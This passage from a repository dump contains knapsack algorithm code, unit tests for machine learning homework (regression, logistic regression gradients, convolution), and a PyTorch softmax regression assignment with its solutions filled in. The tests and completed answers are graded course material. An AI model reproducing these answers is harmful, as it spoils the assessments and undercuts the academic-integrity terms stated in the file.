# is the optimal list of items.
def exhaustive_search(items, cap):
best_value = 0
best_set = []
for candidate in power_set(items):
v = conditional_value(candidate, cap)
if v >= best_value:
best_value = v
best_set = candidate
return best_value, best_set
# Input: a list 'items' of tuples representing the weight and value, respectively,
# of items; and an int, 'cap', representing the maximum capacity of the knapsack.
# Output: The optimal way to select items, maximizing the total value while keeping
# the total weight below cap, found by a dynamic programming method. The first
# variable returned is the optimal value, the second variable returned is the
# optimal list of items.
def dynamic(items, cap):
# Build the table
n = len(items)
c = [[0 for j in range(cap + 1)] for i in range(n + 1)]
for w in range(cap + 1):
c[0][w] = 0
for i in range(1, n + 1):
c[i][0] = 0
for w in range(1, cap + 1):
wi, vi = items[i - 1][0], items[i - 1][1]
if items[i - 1][0] <= w:
if vi + c[i - 1][w - wi] > c[i - 1][w]:
c[i][w] = vi + c[i - 1][w - wi]
else:
c[i][w] = c[i - 1][w]
else:
c[i][w] = c[i - 1][w]
# Trace the optimal path
    i, w = n, cap
best_set = []
while i > 0 and w > 0:
if c[i][w] != c[i - 1][w]:
best_set.append(items[i - 1])
w -= items[i - 1][0]
i -= 1
return c[n][cap], best_set
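# Illustrative example (sketch): with items [(2, 3), (3, 4), (4, 5), (5, 6)] given as
# (weight, value) pairs and cap = 5, dynamic(...) returns (7, [(3, 4), (2, 3)]): the
# two lightest items exactly fill the knapsack for a total value of 7.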
stored = {}
# Input: a list 'items' of tuples representing the weight and value, respectively,
# of items; and an int, 'cap', representing the maximum capacity of the knapsack.
# Output: The selection of items found by a greedy heuristic that considers items
# in decreasing value-to-weight ratio while keeping the total weight below cap.
# The first variable returned is the total value, the second variable returned is
# the list of selected items.
def greedy(items, cap):
sorted_by_ratio = sorted(items, key=lambda item: item[1]/item[0])
sorted_by_ratio.reverse()
used_items = []
total_value = 0
for item in sorted_by_ratio:
if item[0] <= cap:
used_items.append(item)
cap -= item[0]
total_value += item[1]
return total_value, used_items
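# Caution (illustrative example): the ratio-based greedy choice is only a heuristic.
# With items [(1, 2), (3, 5)] and cap = 3 it takes (1, 2) first (ratio 2.0 > 5/3),
# leaving no room for (3, 5), and returns value 2 while the optimum is 5.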
def eff_es(items, cap):
t0 = perf_counter()
result = exhaustive_search(items, cap)
t1 = perf_counter()
elapsed = t1 - t0
print("\nExhaustive Search:\nBest value: " + str(result[0]) + "\nBest set: " + str(result[1]))
print("Time Elapsed: " + str(elapsed))
def eff_dy(items, cap):
t0 = perf_counter()
result = dynamic(items, cap)
t1 = perf_counter()
elapsed = t1 - t0
print("\nDynamic Programming Method:\nBest value: " + str(result[0]) + "\nBest set: " + str(result[1]))
print("Time Elapsed: " + str(elapsed))
def eff_greedy(items, cap):
t0 = perf_counter()
result = greedy(items, cap)
t1 = perf_counter()
elapsed = t1 - t0
print("\nGreedy Method:\nBest value: " + str(result[0]) + "\nBest set: " + str(result[1]))
print("Time Elapsed: " + str(elapsed))
def main(argv):
try:
opts, args = getopt(argv, ":")
except GetoptError:
print("project_3.py <input filename>")
sys.exit(2)
try:
file = open(args[1], "r")
except IndexError:
file = open("input.txt", "r")
except IOError: # Illegal filename
print("File \"" + argv[1] + "\" not found. Defaulting to \:input.txt\"")
file = open("input.txt", "r")
raw_string = file.read()
lines = raw_string.split('\n')
capacity, l_weights, l_values = int(lines[0]), lines[1].split(','), lines[2].split(',')
items = [] # List of tuples representing (weight, value) of items
for i in range(len(l_weights)):
items.append((int(l_weights[i]), int(l_values[i])))
print("Capacity: " + str(capacity))
print("Item\tWeight\tValue")
for x in range(len(items)):
print(str(x + 1) + "\t\t" + str(items[x][0]) + "\t\t" + str(items[x][1]))
eff_dy(items, capacity)
eff_greedy(items, capacity)
eff_es(items, capacity)
return 0
main(sys.argv)
``` |
{
"source": "jojonium/CS-539-Machine-Learning",
"score": 3
} |
#### File: CS-539-Machine-Learning/homework1/test1.py
```python
from problem1 import *
import numpy as np
import sys
'''
Unit test 1:
This file includes unit tests for problem1.py.
'''
#-------------------------------------------------------------------------
def test_terms_and_conditions():
''' Read and Agree with Terms and Conditions'''
assert Terms_and_Conditions() # require reading and agreeing with Terms and Conditions.
#-------------------------------------------------------------------------
def test_python_version():
''' ----------- Problem 1 (10 points in total)---------------------'''
assert sys.version_info[0]==3 # require python 3.7 or above
assert sys.version_info[1]>=7
#-------------------------------------------------------------------------
def test_least_square():
''' (5 points) least square'''
# a dataset of 3 instances, 2 dimensional features
X = np.array([[ 1.,-1.], # the first instance,
[ 1., 0.], # the second instance
[ 1., 1.]])
y = np.array([1.5,2.5,3.5])
w = least_square(X,y)
assert type(w) == np.ndarray
assert w.shape == (2,)
assert np.allclose(w, [2.5,1.], atol = 1e-2)
for _ in range(20):
p = np.random.randint(2,8)
n = np.random.randint(200,400)
w_true = np.random.random(p)
X = np.random.random((n,p))*10
e = np.random.randn(n)*0.01
y = np.dot(X,w_true) + e
w = least_square(X,y)
assert np.allclose(w,w_true, atol = 0.1)
#-------------------------------------------------------------------------
def test_ridge_regression():
''' (5 points) ridge regression'''
# a dataset of 3 instances, 2 dimensional features
X = np.array([[ 1.,-1.], # the first instance,
[ 1., 0.], # the second instance
[ 1., 1.]])
y = np.array([1.5,2.5,3.5])
w = ridge_regression(X,y)
assert type(w) == np.ndarray
assert w.shape == (2,)
assert np.allclose(w, [2.5,1.], atol = 1e-2)
w = ridge_regression(X,y,alpha = 1000)
assert np.allclose(w, [0.,0.], atol = 1e-2)
for _ in range(20):
p = np.random.randint(2,8)
n = np.random.randint(200,400)
w_true = np.random.random(p)
X = np.random.random((n,p))*10
e = np.random.randn(n)*0.01
y = np.dot(X,w_true) + e
w = ridge_regression(X,y)
assert np.allclose(w,w_true, atol = 0.1)
```
#### File: CS-539-Machine-Learning/homework2/test1.py
```python
from problem1 import *
import sys
import math
from gradient1 import *
import warnings
'''
Unit test 1:
This file includes unit tests for problem1.py.
'''
#-------------------------------------------------------------------------
def test_python_version():
''' ----------- Problem 1 (30 points in total)---------------------'''
assert sys.version_info[0]==3 # require python 3.6 or above
assert sys.version_info[1]>=6
#---------------------------------------------------
def test_compute_z():
''' (2 points) compute_z'''
x = np.array([1., 2.])
w = np.array([0.5, -0.6])
b = 0.2
z = compute_z(x,w,b)
assert np.allclose(z, -0.5, atol = 1e-3)
w = np.array([-0.5, 0.6])
z = compute_z(x,w,b)
assert np.allclose(z, .9, atol = 1e-3)
w = np.array([0.5,-0.6])
x = np.array([ 2., 5. ])
z = compute_z(x,w,b)
assert np.allclose(z, -1.8, atol = 1e-3)
b = 0.5
z = compute_z(x,w,b)
assert np.allclose(z, -1.5, atol = 1e-3)
#---------------------------------------------------
def test_compute_dz_db():
''' (1 points) compute_dz_db'''
for _ in range(20):
p = np.random.randint(2,20)
x = np.random.random(p)
w = np.random.random(p)
b = np.random.random(1)
# analytical gradients
db = compute_dz_db()
# numerical gradients
db_true = check_dz_db(x,w,b)
assert np.allclose(db, db_true, atol=1e-2)
#---------------------------------------------------
def test_compute_dz_dw():
''' (1 points) compute_dz_dw'''
for _ in range(20):
p = np.random.randint(2,20)
x = 2*np.random.random(p)-1
w = 2*np.random.random(p)-1
b = 2*np.random.random(1)[0]-1
# analytical gradients
dw = compute_dz_dw(x)
# numerical gradients
dw_true = check_dz_dw(x,w,b)
assert np.allclose(dw, dw_true, atol=1e-2)
#---------------------------------------------------
def test_compute_a():
''' (2 points) compute_a'''
a =compute_a(0.)
assert np.allclose(a, 0.5, atol = 1e-2)
a =compute_a(1.)
assert np.allclose(a, 0.73105857863, atol = 1e-2)
a = compute_a(-1.)
assert np.allclose(a, 0.26894142137, atol = 1e-2)
a = compute_a(-2.)
assert np.allclose(a, 0.1192029, atol = 1e-2)
a =compute_a(-50.)
assert np.allclose(a, 0, atol = 1e-2)
a =compute_a(50.)
assert np.allclose(a, 1, atol = 1e-2)
z = -1000.
a =compute_a(z)
assert np.allclose(a, 0, atol = 1e-2)
z = 1000.
a =compute_a(z)
assert np.allclose(a, 1, atol = 1e-2)
#---------------------------------------------------
def test_compute_da_dz():
''' (2 points) compute_da_dz'''
a = 0.5
da_dz = compute_da_dz(a)
assert np.allclose(da_dz, 0.25, atol= 1e-3)
a = 0.3
da_dz = compute_da_dz(a)
assert np.allclose(da_dz, 0.21, atol= 1e-3)
a = 0.9
da_dz = compute_da_dz(a)
assert np.allclose(da_dz, 0.09, atol= 1e-3)
a = 0.
da_dz = compute_da_dz(a)
assert np.allclose(da_dz, 0, atol= 1e-4)
a = 1.
da_dz = compute_da_dz(a)
assert np.allclose(da_dz, 0, atol= 1e-4)
for _ in range(20):
z = 2000*np.random.random(1)-1000
a = compute_a(z)
# analytical gradients
da_dz = compute_da_dz(a)
# numerical gradients
da_dz_true = check_da_dz(z)
assert np.allclose(da_dz, da_dz_true, atol=1e-4)
#---------------------------------------------------
def test_compute_L():
''' (2 points) compute_L'''
L= compute_L(0.,0)
assert np.allclose(L, np.log(2), atol = 1e-3)
L= compute_L(0.,1)
assert np.allclose(L, np.log(2), atol = 1e-3)
warnings.filterwarnings("error")
L= compute_L(1000.,0)
assert np.allclose(L, 1000., atol = 1e-1)
L= compute_L(2000.,0)
assert np.allclose(L, 2000., atol = 1e-1)
L= compute_L(1000.,1)
assert np.allclose(L, 0., atol = 1e-1)
L= compute_L(2000.,1)
assert np.allclose(L, 0., atol = 1e-1)
L= compute_L(-1000.,0)
assert np.allclose(L, 0., atol = 1e-1)
L= compute_L(-2000.,0)
assert np.allclose(L, 0., atol = 1e-1)
L= compute_L(-1000.,1)
assert np.allclose(L, 1000., atol = 1e-1)
L= compute_L(-2000.,1)
assert np.allclose(L, 2000., atol = 1e-1)
#---------------------------------------------------
def test_compute_dL_dz():
''' (2 points) compute_dL_dz'''
dL_dz = compute_dL_dz(0,0)
assert np.allclose(dL_dz, 0.5, atol= 1e-3)
dL_dz = compute_dL_dz(0,1)
assert np.allclose(dL_dz, -0.5, atol= 1e-3)
dL_dz = compute_dL_dz(1000,1)
assert dL_dz == dL_dz # check if dL_dz is NaN (not a number)
assert np.allclose(dL_dz, 0., atol= 1e-3)
dL_dz = compute_dL_dz(1000,0)
assert dL_dz == dL_dz # check if dL_dz is NaN (not a number)
assert np.allclose(dL_dz, 1., atol= 1e-3)
warnings.filterwarnings("error")
dL_dz = compute_dL_dz(-1000,0)
assert np.allclose(dL_dz, 0., atol= 1e-3)
dL_dz = compute_dL_dz(-1000,1)
assert np.allclose(dL_dz, -1., atol= 1e-3)
for _ in range(20):
z = 10*np.random.random(1)[0]-5
y = np.random.randint(2)
# analytical gradients
dz = compute_dL_dz(z,y)
# numerical gradients
dz_true = check_dL_dz(z,y)
assert np.allclose(dz, dz_true, atol=1e-2)
#---------------------------------------------------
def test_compute_dL_db():
''' (2 points) compute_dL_db'''
dL_dz = -2.0
dz_db = 1.0
dL_db = compute_dL_db(dL_dz,dz_db)
dL_db_true = -2.0
assert np.allclose(dL_db, dL_db_true, atol = 1e-3)
#---------------------------------------------------
def test_compute_dL_dw():
''' (2 points) compute_dL_dw'''
dL_dz = -1.0
dz_dw = np.array([1., 2.])
dL_dw = compute_dL_dw(dL_dz, dz_dw)
dL_dw_true =np.array([-1., -2.])
assert np.allclose(dL_dw, dL_dw_true, atol = 1e-3)
dL_dz = 0.5
dz_dw = np.array([2., 3.])
dL_dw = compute_dL_dw(dL_dz, dz_dw)
dL_dw_true =np.array([1., 1.5])
assert np.allclose(dL_dw, dL_dw_true, atol = 1e-3)
#---------------------------------------------------
def test_backward():
''' (1 points) backward'''
warnings.filterwarnings("error")
x = np.array([1., 2.])
y = 1
z = 0
dL_dw, dL_db = backward(x,y,z)
assert np.allclose(dL_dw,[-0.5,-1], atol=1e-3)
assert np.allclose(dL_db,-0.5, atol=1e-3)
x = np.array([2., 3., 4.])
y = 1
z = 1000.
dL_dw, dL_db = backward(x,y,z)
assert np.allclose(dL_dw,[0,0,0], atol=1e-3)
assert np.allclose(dL_db,0, atol=1e-3)
y = 1
z = -1000.
dL_dw, dL_db = backward(x,y,z)
assert np.allclose(dL_dw,[-2,-3,-4], atol=1e-3)
assert np.allclose(dL_db,-1, atol=1e-3)
y = 0
z = -1000.
dL_dw, dL_db = backward(x,y,z)
assert np.allclose(dL_dw,[0,0,0], atol=1e-3)
assert np.allclose(dL_db,0, atol=1e-3)
y = 0
z = 1000.
dL_dw, dL_db = backward(x,y,z)
assert np.allclose(dL_dw,[2,3,4], atol=1e-3)
assert np.allclose(dL_db,1, atol=1e-3)
#---------------------------------------------------
def test_update_b():
''' (1 points) update_b'''
b = 0.
dL_db = 2.
b = update_b(b, dL_db, alpha=.5)
b_true = -1.
assert np.allclose(b, b_true, atol = 1e-3)
b = update_b(b, dL_db, alpha=1.)
b_true = -3.
assert np.allclose(b, b_true, atol = 1e-3)
#---------------------------------------------------
def test_update_w():
''' (1 points) update_w'''
w = np.array( [0., 0.])
dL_dw = np.array( [1., 2.])
w = update_w(w,dL_dw, alpha=.5)
w_true = - np.array([0.5, 1.])
assert np.allclose(w, w_true, atol = 1e-3)
w = update_w(w,dL_dw, alpha=1.)
w_true = - np.array([1.5, 3.])
assert np.allclose(w, w_true, atol = 1e-3)
#---------------------------------------------------
def test_train():
''' (5 points) train'''
X = np.array([[0., 1.], # an example feature matrix (4 instances, 2 features)
[1., 0.],
[0., 0.],
[1., 1.]])
Y = np.array([0, 1, 0, 1])
w, b = train(X, Y, alpha=1., n_epoch = 100)
assert w[1] + b <= 0 # x1 is negative
assert w[0] + b >= 0 # x2 is positive
assert b <= 0 # x3 is negative
assert w[0]+w[1] + b >= 0 # x4 is positive
X = np.array([[0., 1.],
[1., 0.],
[0., 0.],
[2., 0.],
[0., 2.],
[1., 1.]])
Y = np.array([0, 0, 0, 1, 1, 1])
w, b = train(X, Y, alpha=0.1, n_epoch = 1000)
assert w[0]+w[1] + b >= 0
assert 2*w[0] + b >= 0
assert 2*w[1] + b >= 0
assert w[0] + b <= 0
assert w[1] + b <= 0
assert b <= 0
#---------------------------------------------------
def test_inference():
''' (1 points) inference'''
x= np.array([1,1])
w = np.array([ 0.5, -0.6])
b = 0.2
y = inference(x, w, b)
assert y==1
x= np.array([0,1])
y= inference(x, w, b )
assert y==0
x= np.array([2,2])
y= inference(x, w, b )
assert y==1
#---------------------------------------------------
def test_predict():
''' (5 points) predict'''
Xtest = np.array([[0., 1.],
[1., 0.],
[2., 2.],
[1., 1.]])
w = np.array([ 0.5, -0.6])
b = 0.2
Y= predict(Xtest, w, b )
assert type(Y) == np.ndarray
assert Y.shape == (4,)
Y_true = np.array([0, 1, 1, 1])
assert np.allclose(Y, Y_true, atol = 1e-2)
n_samples = 200
X = np.loadtxt("X1.csv",delimiter=",",dtype=float)
y = np.loadtxt("y1.csv",delimiter=",",dtype=int)
Xtrain, Ytrain, Xtest, Ytest = X[::2], y[::2], X[1::2], y[1::2]
w,b = train(Xtrain, Ytrain,alpha=.001, n_epoch=1000)
Y = predict(Xtrain, w, b)
accuracy = sum(Y == Ytrain)/(n_samples/2.)
print("Training accuracy:", accuracy)
assert accuracy > 0.9
Y = predict(Xtest, w, b)
accuracy = sum(Y == Ytest)/(n_samples/2.)
print("Test accuracy:", accuracy)
assert accuracy > 0.9
```
#### File: CS-539-Machine-Learning/homework3/problem1.py
```python
import torch as th
import numpy as np
# Note: please don't import any new package. You should solve this problem using only the package(s) above.
#-------------------------------------------------------------------------
'''
Problem 1: Softmax Regression (with PyTorch) (12 points)
In this problem, you will implement the softmax regression for multi-class classification problems.
The main goal of this problem is to get familiar with the PyTorch package for deep learning methods.
-------------------------
Package(s) to Install:
Please install python version 3.7 or above and the following package(s):
* torch (for building deep learning models)
How to Install:
* torch: To install 'torch' using pip, you could type in the terminal:
python3 -m pip install torch
-------------------------
A list of all variables being used in this problem is provided at the end of this file.
'''
#--------------------------
def Terms_and_Conditions():
'''
By submitting this homework or changing this function, you agree with the following terms:
(1) Not sharing your code/solution with any student before and after the homework due. For example, sending your code segment to another student, putting your solution online or lending your laptop (if your laptop contains your solution or your Dropbox automatically copied your solution from your desktop computer and your laptop) to another student to work on this homework will violate this term.
(2) Not using anyone's code in this homework and building your own solution. For example, using some code segments from another student or online resources due to any reason (like too busy recently) will violate this term. Changing other's code as your solution (such as changing the variable names) will also violate this term.
(3) When discussing with any other students about this homework, only discuss high-level ideas or use pseudo-code. Don't discuss about the solution at the code level. For example, two students discuss about the solution of a function (which needs 5 lines of code to solve) and they then work on the solution "independently", however the code of the two solutions are exactly the same, or only with minor differences (variable names are different). In this case, the two students violate this term.
All violations of (1),(2) or (3) will be handled in accordance with the WPI Academic Honesty Policy. For more details, please visit: https://www.wpi.edu/about/policies/academic-integrity/dishonesty
Note: we may use the Stanford Moss system to check your code for code similarity. https://theory.stanford.edu/~aiken/moss/
Historical Data: in one year, we ended up finding 25% of the students in that class violating this term in their homework submissions and we handled ALL of these violations according to the WPI Academic Honesty Policy.
'''
#*******************************************
# CHANGE HERE: if you have read and agree with the term above, change "False" to "True".
Read_and_Agree = True
#*******************************************
return Read_and_Agree
#----------------------------------------------------
'''
Given a softmax regression model with parameters W and b, please compute the linear logits z on a mini-batch of data samples x1, x2, ... x_batch_size. In the mean time, please also connect the global gradients of the linear logits z (dL_dz) with the global gradients of the weights dL_dW and the biases dL_db in the PyTorch tensors.
---- Inputs: --------
* x: the feature vectors of a mini-batch of data samples, a float torch tensor of shape (batch_size, p).
* W: the weight matrix of softmax regression, a float torch Tensor of shape (p by c).
* b: the bias values of softmax regression, a float torch vector of length c.
---- Outputs: --------
* z: the linear logits on a mini-batch of data samples, a float torch tensor of shape (batch_size, c).
---- Hints: --------
* When computing z values, in order to connect the global gradients dL_dz with dL_dW and dL_db, you may want to use the operators in PyTorch, instead of in NumPy or Python. For example, np.dot() is the numpy product of two numpy arrays, which will only compute the values z correctly, but cannot connect the global gradients of the torch tensors W and b. Instead, you may want to find the PyTorch version of dot product for two torch tensors.
* For PyTorch tensors, A@B represents the matrix multiplication between two torch matrices A and B.
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_z(x, W, b):
#########################################
## INSERT YOUR CODE HERE (2 points)
z = x@W + b
#########################################
return z
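# Example (sketch, hypothetical shapes): for x of shape (2, 3), W of shape (3, 4) and
# b of length 4, compute_z(x, W, b) returns a (2, 4) tensor; the bias b is broadcast
# across the batch dimension by PyTorch.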
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test1.py:test_compute_z
--- OR ----
python3 -m nose -v test1.py:test_compute_z
--- OR ----
python -m nose -v test1.py:test_compute_z
---------------------------------------------------
'''
#----------------------------------------------------
'''
Suppose we are given a softmax regression model and we have already computed the linear logits z on a mini-batch of training samples. Suppose the labels of the training samples are in y. Please compute the average loss of the softmax regression model on the mini-batch of training samples. In the mean time, please also connect the global gradients of the linear logits z (dL_dz) with the loss L correctly.
---- Inputs: --------
* z: the linear logits on a mini-batch of data samples, a float torch tensor of shape (batch_size, c).
* y: the labels of a mini-batch of data samples, a torch integer vector of length batch_size. The value of each element can be 0,1,2, ..., or (c-1).
---- Outputs: --------
* L: the average multi-class cross entropy loss on a mini-batch of training samples, a torch float scalar.
---- Hints: --------
* The loss L is a scalar, computed from the average of the cross entropy loss on all samples in the mini-batch. For example, if the loss on the four training samples are 0.1, 0.2, 0.3, 0.4, then the final loss L is the average of these numbers as (0.1+0.2+0.3+0.4)/4 = 0.25.
* You could use CrossEntropyLoss in PyTorch to compute the loss.
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_L(z, y):
#########################################
## INSERT YOUR CODE HERE (2 points)
L = th.nn.CrossEntropyLoss(reduction='mean')(z, y)
#########################################
return L
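# Example (sketch): compute_L(th.tensor([[0., 0.]]), th.tensor([0])) evaluates to
# -log(0.5) (about 0.6931), since equal logits assign probability 1/2 to each class.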
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test1.py:test_compute_L
--- OR ----
python3 -m nose -v test1.py:test_compute_L
--- OR ----
python -m nose -v test1.py:test_compute_L
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Gradient Descent) Suppose we are given a softmax regression model with parameters (W and b) and we have a mini-batch of training data samples (x,y). Suppose we have already computed the global gradients of the average loss L w.r.t. the weights W on the mini-batch of data samples. Assume that we have already created an optimizer for the parameter W and b. Please update the weights W and b using gradient descent. After the update, the global gradients of W and b should be set to all zeros.
---- Inputs: --------
* optimizer: a PyTorch optimizer (such as SGD, ADAM, RMSProp) to handle the gradient descent for parameters in the model (W and b).
---- Hints: --------
    * Although the parameters W and b are NOT given explicitly in the input of this function, we can assume that W and b are already properly configured in the optimizer. So the optimizer is set up to handle the parameters W and b.
    * Although the gradients of the parameters dL_dW and dL_db are NOT given explicitly in the input of this function, we can assume that in the PyTorch tensors W and b, the gradients are already properly computed and stored in W.grad (for dL_dW) and b.grad (for dL_db).
    * Although the learning rate is NOT given explicitly in the input of this function, we can assume that the optimizer was already configured with the learning rate parameter.
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def update_parameters(optimizer):
#########################################
## INSERT YOUR CODE HERE (2 points)
optimizer.step()
optimizer.zero_grad()
#########################################
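# Note (sketch): optimizer.step() applies one gradient-descent update using the
# gradients accumulated in W.grad and b.grad, and optimizer.zero_grad() clears them
# so that the next mini-batch's backward() does not accumulate onto stale gradients.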
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test1.py:test_update_parameters
--- OR ----
python3 -m nose -v test1.py:test_update_parameters
--- OR ----
python -m nose -v test1.py:test_update_parameters
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Training Softmax Regression) Given a training dataset X (features), Y (labels) in a data loader, train the softmax regression model using mini-batch stochastic gradient descent: iteratively update the weights W and biases b using the gradients on each mini-batch of random data samples. We repeat n_epoch passes over all the training samples.
---- Inputs: --------
* data_loader: the PyTorch loader of a dataset.
* c: the number of classes in the classification task, an integer scalar.
* p: the number of input features.
* alpha: the step-size parameter of gradient descent, a float scalar.
* n_epoch: the number of passes to go through the training dataset in the training process, an integer scalar.
---- Outputs: --------
* W: the weight matrix of softmax regression, a float torch Tensor of shape (p by c).
* b: the bias values of softmax regression, a float torch vector of length c.
---- Hints: --------
* Step 1 Forward pass: compute the linear logits and loss.
* Step 2 Back propagation: compute the gradients of W and b.
* Step 3 Gradient descent: update the parameters W and b using gradient descent.
* This problem can be solved using 4 line(s) of code.
'''
#---------------------
def train(data_loader, c, p, alpha=0.001, n_epoch=100):
W = th.randn(p,c, requires_grad=True) # initialize W randomly using standard normal distribution
b = th.zeros(c, requires_grad=True) # initialize b as all zeros
optimizer = th.optim.SGD([W,b], lr=alpha) # SGD optimizer
for _ in range(n_epoch): # iterate through the dataset n_epoch times
for mini_batch in data_loader: # iterate through the dataset, with one mini-batch of random training samples (x,y) at a time
x=mini_batch[0] # the feature vectors of the data samples in a mini-batch
y=mini_batch[1] # the labels of the samples in a mini-batch
#########################################
## INSERT YOUR CODE HERE (2 points)
            z = compute_z(x, W, b)            # Step 1: forward pass - linear logits
            L = compute_L(z, y)               # Step 1: forward pass - average loss
            L.backward()                      # Step 2: back propagation - fill W.grad and b.grad
            update_parameters(optimizer)      # Step 3: gradient descent - update W and b, reset grads
#########################################
return W, b
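# Usage sketch (hypothetical synthetic data; DataLoader and TensorDataset come from
# torch.utils.data, which is outside the scope of this problem file):
#   from torch.utils.data import DataLoader, TensorDataset
#   X, Y = th.randn(100, 5), th.randint(0, 3, (100,))   # p = 5 features, c = 3 classes
#   loader = DataLoader(TensorDataset(X, Y), batch_size=10, shuffle=True)
#   W, b = train(loader, c=3, p=5, alpha=0.01, n_epoch=20)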
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test1.py:test_train
--- OR ----
python3 -m nose -v test1.py:test_train
--- OR ----
python -m nose -v test1.py:test_train
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Using Softmax Regression) Given a trained softmax regression model with parameters W and b. Suppose we have a mini-batch of test data samples. Please use the softmax regression model to predict the labels.
---- Inputs: --------
* x: the feature vectors of a mini-batch of data samples, a float torch tensor of shape (batch_size, p).
* W: the weight matrix of softmax regression, a float torch Tensor of shape (p by c).
* b: the bias values of softmax regression, a float torch vector of length c.
---- Outputs: --------
* y_predict: the predicted labels of a mini-batch of test data samples, a torch integer vector of length batch_size. y_predict[i] represents the predicted label on the i-th test sample in the mini-batch.
---- Hints: --------
* This is a multi-class classification task, for each sample, the label should be predicted as the index of the largest value of each row of the linear logit z.
* You could use the argmax() function in PyTorch to return the indices of the largest values in a tensor.
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def predict(x, W, b):
#########################################
## INSERT YOUR CODE HERE (4 points)
z = compute_z(x, W, b)
y_predict = th.argmax(z, 1)
#########################################
return y_predict
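# Example (sketch): continuing the usage sketch after train(), predict(X, W, b) would
# return an integer tensor of length 100 with entries in {0, 1, 2}.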
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test1.py:test_predict
--- OR ----
python3 -m nose -v test1.py:test_predict
--- OR ----
python -m nose -v test1.py:test_predict
---------------------------------------------------
'''
#--------------------------------------------
'''
TEST problem 1:
Now you can test the correctness of all the above functions by typing the following in the terminal:
---------------------------------------------------
nosetests -v test1.py
--- OR ----
python3 -m nose -v test1.py
--- OR ----
python -m nose -v test1.py
---------------------------------------------------
If your code passed all the tests, you will see the following message in the terminal:
----------- Problem 1 (12 points in total)--------------------- ... ok
* (2 points) compute_z ... ok
* (2 points) compute_L ... ok
* (2 points) update_parameters ... ok
* (2 points) train ... ok
* (4 points) predict ... ok
----------------------------------------------------------------------
Ran 5 tests in 1.489s
OK
'''
#--------------------------------------------
#--------------------------------------------
'''
List of All Variables
* n: the number of data instance in the training set.
* p: the number of input features.
* c: the number of classes in the classification task, an integer scalar.
* batch_size: the number of samples in a mini-batch, an integer scalar.
* x: the feature vectors of a mini-batch of data samples, a float torch tensor of shape (batch_size, p).
* y: the labels of a mini-batch of data samples, a torch integer vector of length batch_size. The value of each element can be 0,1,2, ..., or (c-1).
* W: the weight matrix of softmax regression, a float torch Tensor of shape (p by c).
* b: the bias values of softmax regression, a float torch vector of length c.
* z: the linear logits on a mini-batch of data samples, a float torch tensor of shape (batch_size, c).
* a: the softmax activations on a mini-batch of data samples, a float torch tensor of shape (batch_size, c).
* L: the average multi-class cross entropy loss on a mini-batch of training samples, a torch float scalar.
* data_loader: the PyTorch loader of a dataset.
* alpha: the step-size parameter of gradient descent, a float scalar.
* n_epoch: the number of passes to go through the training dataset in the training process, an integer scalar.
* y_predict: the predicted labels of a mini-batch of test data samples, a torch integer vector of length batch_size. y_predict[i] represents the predicted label on the i-th test sample in the mini-batch.
* optimizer: a PyTorch optimizer (such as SGD, ADAM, RMSProp) to handle the gradient descent for parameters in the model (W and b).
'''
#--------------------------------------------
```
#### File: CS-539-Machine-Learning/homework3/test2.py
```python
from problem2 import *
import sys
import math
import torch as th
from torch.utils.data import Dataset, DataLoader
from torch import Tensor
'''
Unit test 2:
This file includes unit tests for problem2.py.
'''
#-------------------------------------------------------------------------
def test_python_version():
''' ----------- Problem 2 (32 points in total)---------------------'''
assert sys.version_info[0]==3 # require python 3.6 or above
assert sys.version_info[1]>=6
#---------------------------------------------------
def test_conv2d_a():
''' (2 points) conv2d_a'''
# an image of 6 by 8 pixels
# h = 6, w = 8
x1 = th.tensor([[0.,1.,0.,0.,0.,0.,0.,0.],
[1.,1.,1.,0.,0.,0.,0.,0.],
[0.,1.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,1.,0.],
[0.,0.,0.,0.,0.,1.,1.,1.],
[0.,0.,0.,0.,0.,0.,1.,0.]])
# a filter of shape 3 x 3, trying to match a pattern '+' in the image
w1 = th.tensor([[0.,1.,0.],
[1.,1.,1.],
[0.,1.,0.]], requires_grad=True)
b1 = th.tensor(-4., requires_grad=True)
z1 = conv2d_a(x1,w1,b1)
assert type(z1) == Tensor
assert np.allclose(z1.size(),(4,6))
z1_true = [[ 1.,-2.,-3.,-4.,-4.,-4.],
[-2.,-2.,-4.,-4.,-4.,-3.],
[-3.,-4.,-4.,-4.,-2.,-2.],
[-4.,-4.,-4.,-3.,-2., 1.]]
assert np.allclose(z1.data,z1_true, atol=0.1)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in z)
L = z1.sum()
# back propagation
L.backward()
# check the gradients of w1, b1
dL_dw1_true = [[5., 5., 2.],
[5., 6., 5.],
[2., 5., 5.]]
assert np.allclose(w1.grad, dL_dw1_true, atol= 0.1)
assert np.allclose(b1.grad, 24, atol= 0.1)
# test another example:
# an image of 4 by 4 pixels
x1 = th.tensor([[1.,2.,3.,0.],
[1.,2.,3.,0.],
[2.,3.,4.,0.],
[0.,0.,0.,0.]])
# a filter of shape 3 x 3
w1 = th.tensor([[1.,2.,3.],
[2.,3.,4.],
[3.,1.,5.]], requires_grad=True)
b1 = th.tensor(-5., requires_grad=True)
z1 = conv2d_a(x1,w1,b1)
assert type(z1) == Tensor
assert np.allclose(z1.size(),(2,2))
z1_true = [[58., 29.],
[38., 21.]]
assert np.allclose(z1.data,z1_true, atol=0.1)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in z)
L = z1.sum()
# back propagation
L.backward()
# check the gradients of w1, b1
dL_dw1_true = [[ 6., 10., 6.],
[ 8., 12., 7.],
[ 5., 7., 4.]]
assert np.allclose(w1.grad, dL_dw1_true, atol= 0.1)
assert np.allclose(b1.grad, 4, atol= 0.1)
# test the function with random input sizes
s = np.random.randint(2,5) # size of the filter
    h = s+np.random.randint(5,20) # height of the image
